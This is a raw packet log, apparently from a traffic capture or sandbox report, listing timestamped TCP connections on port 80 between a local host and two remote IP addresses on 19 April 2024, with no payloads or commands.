                                                                                                                                    Apr 19, 2024 13:43:45.880781889 CEST8049863104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.880891085 CEST4986380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.015235901 CEST4986380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.015818119 CEST4986480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.119810104 CEST8049863104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.119868040 CEST4986380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.123986006 CEST8049864104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.127641916 CEST4986480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.127741098 CEST4986480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.232037067 CEST8049864104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.232368946 CEST8049864104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.232537031 CEST4986480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.336698055 CEST8049864104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.503349066 CEST8049864104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.503376007 CEST8049864104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.503508091 CEST4986480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.627690077 CEST4986480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.628392935 CEST4986580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.732817888 CEST8049865104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.732850075 CEST8049864104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.732932091 CEST4986480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.733078957 CEST4986580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.733078957 CEST4986580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.838076115 CEST8049865104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.838105917 CEST8049865104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:46.838356972 CEST4986580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:46.942837954 CEST8049865104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.201931000 CEST8049865104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.201961994 CEST8049865104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.202117920 CEST4986580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.318506002 CEST4986580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.319606066 CEST4986680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.423564911 CEST8049865104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.423834085 CEST4986580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.424205065 CEST8049866104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.424285889 CEST4986680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.424376011 CEST4986680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.528676987 CEST8049866104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.529381037 CEST8049866104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.529648066 CEST4986680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.634438038 CEST8049866104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.793946028 CEST8049866104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.793972015 CEST8049866104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:47.794136047 CEST4986680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.927861929 CEST4986680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:47.928571939 CEST4986780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.032866001 CEST8049867104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.032953978 CEST4986780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.033082962 CEST4986780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.033998013 CEST8049866104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.034214020 CEST4986680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.137352943 CEST8049867104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.137466908 CEST8049867104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.137840033 CEST4986780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.242259026 CEST8049867104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.503964901 CEST8049867104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.504029036 CEST8049867104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.504199028 CEST4986780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.626785040 CEST4986780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.627717018 CEST4986880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.731730938 CEST8049867104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.731940985 CEST4986780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.732254982 CEST8049868104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.735631943 CEST4986880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.735728979 CEST4986880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.840049028 CEST8049868104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.840141058 CEST8049868104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:48.840322018 CEST4986880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:48.944896936 CEST8049868104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.148495913 CEST4986880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.150604963 CEST4986980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.209698915 CEST8049868104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.209764004 CEST8049868104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.209821939 CEST4986880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.209844112 CEST4986880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.255160093 CEST8049868104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.255275965 CEST4986880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.255279064 CEST8049869104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.255350113 CEST4986980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.255491972 CEST4986980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.346828938 CEST4987080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.359658957 CEST8049869104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.359958887 CEST8049869104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.360155106 CEST4986980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.451683998 CEST8049870104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.452927113 CEST4987080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.453049898 CEST4987080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.464514017 CEST8049869104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.557562113 CEST8049870104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.557626963 CEST8049870104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.557785034 CEST4987080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.632520914 CEST8049869104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.632580042 CEST8049869104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.633615017 CEST4986980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.662733078 CEST8049870104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.818070889 CEST8049870104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.818130970 CEST8049870104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:49.818181038 CEST4987080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.941683054 CEST4986980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.941828012 CEST4987080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:49.942322969 CEST4987180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.047460079 CEST8049869104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.047523975 CEST8049871104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.047529936 CEST4986980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.047602892 CEST4987180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.047662973 CEST8049870104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.047717094 CEST4987080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.047776937 CEST4987180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.153765917 CEST8049871104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.154071093 CEST8049871104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.154275894 CEST4987180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.258790016 CEST8049871104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.525952101 CEST8049871104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.526015043 CEST8049871104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.526176929 CEST4987180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.666274071 CEST4987280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.771039963 CEST8049872104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.771229982 CEST4987280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.773601055 CEST4987280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.877840042 CEST8049872104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.878026962 CEST8049872104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:50.878290892 CEST4987280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:50.983494043 CEST8049872104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.151772022 CEST8049872104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.151835918 CEST8049872104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.151886940 CEST4987280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.267410994 CEST4987280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.267952919 CEST4987380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.372576952 CEST8049873104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.372684002 CEST4987380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.372816086 CEST4987380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.373728037 CEST8049872104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.373900890 CEST4987280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.477442026 CEST8049873104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.477639914 CEST8049873104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.479341030 CEST4987380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.583911896 CEST8049873104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.855530977 CEST8049873104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.855607033 CEST8049873104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:51.855715990 CEST4987380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.971146107 CEST4987380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:51.971438885 CEST4987480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.075690985 CEST8049874104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.075759888 CEST4987480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.075906992 CEST4987480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.076030970 CEST8049873104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.076096058 CEST4987380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.180370092 CEST8049874104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.180644989 CEST8049874104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.180787086 CEST4987480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.285376072 CEST8049874104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.539894104 CEST8049874104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.539927006 CEST8049874104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.539968967 CEST4987480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.650849104 CEST4987180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.665365934 CEST4987480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.666351080 CEST4987580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.770294905 CEST8049874104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.770359993 CEST4987480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.770482063 CEST8049875104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.770610094 CEST4987580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.770729065 CEST4987580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.880243063 CEST8049875104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.880300045 CEST8049875104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:52.880613089 CEST4987580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:52.985469103 CEST8049875104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.159071922 CEST8049875104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.159133911 CEST8049875104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.159286976 CEST4987580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:53.287775993 CEST4987580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:53.288177967 CEST4987680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:53.392828941 CEST8049875104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.392889977 CEST8049876104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.392961025 CEST4987580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:53.393088102 CEST4987680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:53.393157959 CEST4987680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:53.498008013 CEST8049876104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.498394012 CEST8049876104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.498696089 CEST4987680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:53.603056908 CEST8049876104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.756548882 CEST8049876104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.756614923 CEST8049876104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:53.756834030 CEST4987680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:54.006364107 CEST4987680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:54.007285118 CEST4987780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:54.112222910 CEST8049877104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:54.112586975 CEST8049876104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:54.112704039 CEST4987680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:54.115596056 CEST4987780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:54.271435976 CEST4987780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:54.375906944 CEST8049877104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:54.375962973 CEST8049877104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:54.376197100 CEST4987780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:54.486054897 CEST8049877104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:54.642930031 CEST8049877104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:54.642992973 CEST8049877104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:54.643343925 CEST4987780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:55.976775885 CEST4987780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:55.977171898 CEST4987880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:55.986011028 CEST4987880192.168.2.4172.67.189.92
                                                                                                                                    Apr 19, 2024 13:43:56.058331966 CEST4987980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.081363916 CEST8049877104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.081408024 CEST8049878104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.081480026 CEST4987780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.081587076 CEST4987880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.090209007 CEST8049878172.67.189.92192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.090293884 CEST4987880192.168.2.4172.67.189.92
                                                                                                                                    Apr 19, 2024 13:43:56.090356112 CEST4987880192.168.2.4172.67.189.92
                                                                                                                                    Apr 19, 2024 13:43:56.162663937 CEST8049879104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.162766933 CEST4987980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.162867069 CEST4987980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.267090082 CEST8049879104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.267267942 CEST8049879104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.267438889 CEST4987980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.371732950 CEST8049879104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.525645018 CEST8049879104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.525708914 CEST8049879104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.525758028 CEST4987980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.643084049 CEST4987980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.643902063 CEST4988080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.748147964 CEST8049879104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.748240948 CEST4987980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.748306990 CEST8049880104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.748378992 CEST4988080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.748488903 CEST4988080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.853055000 CEST8049880104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.853125095 CEST8049880104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:56.853269100 CEST4988080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:56.957854986 CEST8049880104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.207695961 CEST8049880104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.207758904 CEST8049880104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.207808018 CEST4988080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:57.367343903 CEST4988180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:57.472059011 CEST8049881104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.473630905 CEST4988180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:57.473728895 CEST4988180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:57.578439951 CEST8049881104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.578998089 CEST8049881104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.579149961 CEST4988180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:57.683769941 CEST8049881104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.841645956 CEST8049881104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.841713905 CEST8049881104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:57.841908932 CEST4988180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:57.965137959 CEST4988080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:57.965243101 CEST4988180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:57.965553045 CEST4988280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.070080996 CEST8049882104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.070166111 CEST4988280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.070297956 CEST4988280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.071630955 CEST8049881104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.071708918 CEST4988180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.174695969 CEST8049882104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.174756050 CEST8049882104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.174902916 CEST4988280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.279112101 CEST8049882104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.448049068 CEST8049882104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.448141098 CEST8049882104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.448277950 CEST4988280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.570019960 CEST4988280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.570691109 CEST4988380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.675210953 CEST8049882104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.675275087 CEST8049883104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.675303936 CEST4988280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.675368071 CEST4988380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.675501108 CEST4988380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.779885054 CEST8049883104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.780447006 CEST8049883104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:58.780755997 CEST4988380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:58.885497093 CEST8049883104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.039083004 CEST8049883104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.039145947 CEST8049883104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.039321899 CEST4988380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.163731098 CEST4988380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.164019108 CEST4988480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.268621922 CEST8049884104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.268687963 CEST8049883104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.268915892 CEST4988380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.269052982 CEST4988480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.269053936 CEST4988480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.373718023 CEST8049884104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.374207020 CEST8049884104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.374496937 CEST4988480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.479465008 CEST8049884104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.648622990 CEST8049884104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.648686886 CEST8049884104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.648916006 CEST4988480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.768275023 CEST4988480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.768914938 CEST4988580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.873166084 CEST8049884104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.873378038 CEST4988480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.873619080 CEST8049885104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.873694897 CEST4988580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.873846054 CEST4988580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:59.978426933 CEST8049885104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.978487968 CEST8049885104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:59.978645086 CEST4988580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:44:00.083370924 CEST8049885104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:00.324489117 CEST8049885104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:00.324687958 CEST8049885104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:44:00.324832916 CEST4988580192.168.2.4104.21.57.61
